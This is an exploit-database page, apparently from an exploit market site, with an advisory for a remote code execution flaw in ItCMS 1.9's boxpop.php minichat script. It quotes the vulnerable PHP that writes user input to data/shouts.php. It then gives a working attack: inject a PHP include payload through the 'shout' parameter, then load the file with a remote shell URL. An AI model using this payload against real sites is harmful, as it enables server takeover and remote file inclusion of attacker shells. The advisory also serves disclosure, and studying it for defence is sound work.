[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability

Author
Cod3rZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2947
Category
web applications
Date add
01-05-2008
Platform
unsorted
==========================================================
ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability
==========================================================



#===========================================================================================================================#
#                                     _ ____             _        _ _                _                                      #
#                          __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                    #
#                         / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                   #
#                         \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                   #
#===========================================================================================================================#
#                                              ItCMS 1.9 Remote File Rewriting                                              #
#===========================================================================================================================#
#                                                      Author : Cod3rZ                                                      #
#===========================================================================================================================#
# Remote File Rewriting:                                                                                                    #
#===========================================================================================================================#
# /box/minichat/boxpop.php                                                                                                  #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){                                                                                                 #
# $shout = $_POST['shout'];                                                                                           	    #
# } else if ($_GET["shout"]!=""){                                                                                           #
# $shout = $_GET["shout"];                                                                                            	    #
# }                                                                                                                         #
# [...]                                                                                                                     #
# $shout = trim($shout);                                                                                                    #
# $shout = stripslashes($shout);                                                                                            #
# $shout = str_replace ("\r\n", " [br] ", $shout);                                                                          #
# $shout = first($shout);                                                                                                   #
# [...]                                                                                                                     #
# $FileName="data/shouts.php";                                                                                              #
# if($FilePointer=fopen($FileName, "a+")){                                                                                  #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n");                                       #
# fclose($FilePointer);                                                                                                     #
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout,                            #
# and then we go in data/shouts.php?rfi=[shell]                                                                             #
#===========================================================================================================================#
# There are many other bugs, find it yourself                                                                               #
#===========================================================================================================================#



#  0day.today [2024-12-25]  #